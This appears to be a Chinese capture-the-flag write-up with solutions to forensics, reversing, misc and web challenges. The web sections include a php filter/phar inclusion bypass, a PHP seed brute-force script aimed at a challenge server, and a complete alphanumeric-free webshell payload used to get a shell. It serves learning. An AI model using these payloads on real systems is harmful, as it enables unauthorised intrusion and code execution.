部分题解

流量分析

导出http 发现有个flag.zip
解压后文件内容是rgb的像素点
脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
#-*- coding:utf-8 -*-
from PIL import Image
import re
a=98457
for k in range(1, a+1):
if (a % k == 0) and (k < a):
x = k
y = int(a // k)
print x,y
im = Image.new("RGB",(x,y))
file = open('ce.txt')
for i in range(0,x):
for j in range(0,y):
line = file.readline()#
rgb = line.split(",")
im.putpixel((i,j),(int(rgb[0]),int(rgb[1]),int(rgb[2])))
im.show()

Re4newer

ida打开
定位到判断函数
mark

flag 是v4和0x22的异或

mark

然后web狗手撕的 :)

Misc200

当时没做出来,因为没有去调试。。
拖到jeb里看一下有一个加密,一个解密文件,解密文件没东西,看了下加密,就是普通的和密码进行异或。所以就是要找到password,并没有找到。
我们进行调试,在加密一下就可以得到原文了,而且发现此时密码已经记住,然后把加密文件扔进去,就可以得到flag图片了

pyc分析

2015xdctf原题
uncompyle6 revPyc.pyc

反编译出源码

查看globals()

1
2
3
4
5
6
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "<stdin>", line 1, in <lambda>
IOError: [Errno 2] No such file or directory: 'flag.txt'
>>> globals()
{'string': <module 'string' from 'D:\Python27\lib\string.pyc'>, '__builtins__': <module '__builtin__' (built-in)>, '__package__': None, 'i': 654, 'table': '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~', 'encode': <function encode at 0x02836C30>, '__name__': '__main__', 'getbit': <function getbit at 0x028364B0>, '__doc__': None, 'setbit': <function setbit at 0x02815E30>}

整理完代码

1
2
3
4
5
6
7
8
9
10
[data['i'] = ((table.index(data['i']) + 1))
__this() for __l['buf'] in [(
j=(i / 6) * 8 + (i % 6)
setbit(buf, i, getbit(data, j))
if __i is not __sentinel else __after())(next(__items, __sentinel)))())
(iter(xrange((__l['_len'] * 6)))
for __g['table'] in [(string.printable.strip())]][0] for __g['string'] in [(__import__('string', __g, __g))]][0])(globals(), (lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))))

加密方式就出来了,把原字符在table的index+1后,把后6位保存到文件里,由于64==38,我就每3字节一起decode,decode3b函数

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
python
#Embedded file name: rev300.py
__g = globals()
__y = (lambda f: (lambda x: x(x))(lambda y: f(lambda : y(y)())))
string = (__import__('string', __g, __g))
table = (string.printable.strip())
"""
setbit = (lambda p, pos, value: (lambda __l: [ [ [ (lambda __target, __slice, __value: [ (lambda __target, __slice, __value: [ __l['p'] for __target[__slice] in [(lambda __old: (lambda __ret: (__old | __value if __ret is NotImplemented else __ret))(getattr(__old, '__ior__', lambda other: NotImplemented)(__value)))(__target[__slice])] ][0])(__l['p'], __l['cpos'], __l['value'] << __l['bpos']) for __target[__slice] in [(lambda __old: (lambda __ret: (__old & __value if __ret is NotImplemented else __ret))(getattr(__old, '__iand__', lambda other: NotImplemented)(__value)))(__target[__slice])] ][0])(__l['p'], __l['cpos'], ~(1 << __l['bpos'])) for __l['bpos'] in [__l['pos'] % 8] ][0] for __l['cpos'] in [__l['pos'] / 8] ][0] for __l['p'], __l['pos'], __l['value'] in [(p, pos, value)] ][0])({}))
setbit.__name__ = 'setbit'
getbit = (lambda p, pos: (lambda __l: [ [ [ __l['p'][__l['cpos']] >> __l['bpos'] & 1 for __l['bpos'] in [__l['pos'] % 8] ][0] for __l['cpos'] in [__l['pos'] / 8] ][0] for __l['p'], __l['pos'] in [(p, pos)] ][0])({}))
getbit.__name__ = 'getbit'
encode = (lambda data, buf: (lambda __l: [ [ (lambda __items, __after, __sentinel: __y(lambda __this: lambda : (lambda __i: ([ [ __this() for __l['data'][__l['i']] in [table.index(__l['data'][__l['i']]) + 1] ][0] for __l['i'] in [__i] ][0] if __i is not __sentinel else __after()))(next(__items, __sentinel)))())(iter(xrange(__l['_len'])), lambda : (lambda __items, __after, __sentinel: __y(lambda __this: lambda : (lambda __i: ([ [ [ __this() for __l['buf'] in [setbit(__l['buf'], __l['i'], getbit(__l['data'], __l['j']))] ][0] for __l['j'] in [__l['i'] / 6 * 8 + __l['i'] % 6] ][0] for __l['i'] in [__i] ][0] if __i is not __sentinel else __after()))(next(__items, __sentinel)))())(iter(xrange(__l['_len'] * 6)), lambda : __l['buf'], []), []) for __l['_len'] in [len(__l['data'])] ][0] for __l['data'], __l['buf'] in [(data, buf)] ][0])({}))
encode.__name__ = 'encode'
"""
def setbit(p,pos,value):
bpos = pos % 8
cpos = pos / 8
s = p
s[cpos] = p[cpos] & (~(1 << bpos))
s[cpos] = p[cpos] | (value << bpos)
return s
def getbit(p,pos):
bpos = pos % 8
cpos = pos / 8
return p[cpos] >> bpos & 1
def encode(data, buf):
indexdata = []
for i in xrange(len(data)):
indexdata.append(table.index(data[i]) + 1)
res = buf
for i in xrange(len(data)*6):
j = i / 6 * 8 + i % 6
setbit(res, i, getbit(indexdata, j))
return res
def encrypt():
fin = open('key.txt', 'r')
s = fin.read().strip()
fin.close()
ss = ([])
sss = ([])
__items = iter(s)
__after = (lambda : [ [ (lambda __items, __after, __sentinel: __y(lambda __this: lambda : (lambda __i: ([ (lambda __value: [ __this() for __g['sssss'] in [(lambda __ret: (__g['sssss'] + __value if __ret is NotImplemented else __ret))(getattr(__g['sssss'], '__iadd__', lambda other: NotImplemented)(__value))] ][0])(chr(c)) for __g['c'] in [__i] ][0] if __i is not __sentinel else __after()))(next(__items, __sentinel)))())(iter(ssss), lambda : [ (fout.write(sssss), (fout.close(), None)[1])[1] for __g['fout'] in [open('key1.enc', 'wb+')] ][0], []) for __g['sssss'] in [''] ][0] for __g['ssss'] in [encode(ss, sss)] ][0])
__sentinel = ([])
__y(lambda __this: lambda : (lambda __i: ([ (ss.append(c), (sss.append(0), __this())[1])[1] for __g['c'] in [__i] ][0] if __i is not __sentinel else __after()))(next(__items, __sentinel)))()
def decrypt():
fin = open('key.enc','rb')
cipher = fin.read()
plain = ''
def decode3b(s):
a = s >> 16
b = (s >> 8) & 0xFF
c = s & 0xff
sa = bin(a)[2:].zfill(8)
sb = bin(b)[2:].zfill(8)
sc = bin(c)[2:].zfill(8)
return table[int(sa[2:], 2)] + table[int(sb[4:] + sa[:2], 2)] + table[int(sc[6:] + sb[:4], 2)] + table[int(sc[:6], 2)]
for i in xrange(0,len(cipher),3):
s = int(cipher[i:i+3].encode('hex'),16)
plain += decode3b(s)
print plain
return ''.join(table[(table.index(c) + 63) % 64] for c in plain)
if __name__ == '__main__':
print decrypt()
print table[table.index("d")+64]
#Key:9733c070b2138e5f

由于只保留了最后6位,所以在table里的index大于64的特殊字符是没有的,key后面的d其实是:

web200

根据http://118.190.87.135:10080/?op=home
尝试文件包含 ../ 关键字被禁
使用php filter 读取文件
common.php 发现自动添加.png后缀

mark

可以使用phar协议绕过

mark

但是php 命令执行相关函数被禁 可以使用php函数读取

mark

mark

简单的安卓

jeb载入 即可

mark

热身运动

gif 一帧帧的看

发现坐标可以和base64 一一对应 最后=补全即可

ZmxhZ3sxdF8xNV9mdW5ueX0=

flag{1t_15_funny}

random

.index.php.swp
发现源码泄露

mark

简单的mt_srand随机数爆破 session置空的绕过

脚本如下

1
2
<?php
function create_password($pw_length = 10){ $randpwd = ""; for ($i = 0; $i < $pw_length; $i++){ $randpwd .= chr(mt_rand(100, 200)); } return $randpwd; } $t = time()-20; for($i = $t; $i < $t + 40; $i++){ mt_srand($i); $pwd=create_password(); $curl = file_get_contents("http://114.215.138.89:10080/index.php?pwd=$pwd&login="); echo $curl.'<br>'; }

web300

mark

阅读源码 构造不含上述字符的shell即可

根据p牛博客
https://www.leavesongs.com/PENETRATION/webshell-without-alphanum.html

‘a’++ => ‘b’,’b’++ => ‘c’… 所以,我们只要能拿到一个变量,其值为a,通过自增操作即可获得a-z中所有字符。
那么,如何拿到一个值为字符串’a’的变量呢?
巧了,数组(Array)的第一个字母就是大写A,而且第4个字母是小写a。也就是说,我们可以同时拿到小写和大写A,等于我们就可以拿到a-z和A-Z的所有字母。
在PHP中,如果强制连接数组和字符串的话,数组将被转换成字符串,其值为Array:
再取这个字符串的第一个字母,就可以获得’A’了
payload:
http://127.0.0.1:8000/web300.php?content=$_=[].'';$_=$_[']'=='['];$___=$_;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$____='_';$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$_=$$____;$___($_[_]);

url 编码一下 提交
getshell
cat flag.php

mark

Misc300

脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
import pickle
from PIL import Image
with open('pixels.jpg.pkl') as f:
data= pickle.loads(f.read().encode('utf8'))
white_pixels = [(int(e[0]), int(e[1])) for e in data[1:]]
width = max([p[0] for p in white_pixels]) + 10
height = max([p[1] for p in white_pixels])+ 10
image = Image.new('1', (width, height), 0)
pixels = image.load()
for pixel in white_pixels:
pixels[pixel[0],pixel[1]] = 255
image.show()

mark

漫画图作者为billwatterson,就是flag

web400

这个题好像没人做出来。。。
赛后听人说是先用ssrf 302读文件,上传文件页面需要session[‘token’]=1,然后开启debug请求user.php获取session,利用session上传文件,common.php可以自动包含文件,include参数加入赋值等于upload,会自动包含ini文件。
没有环境也没有复现。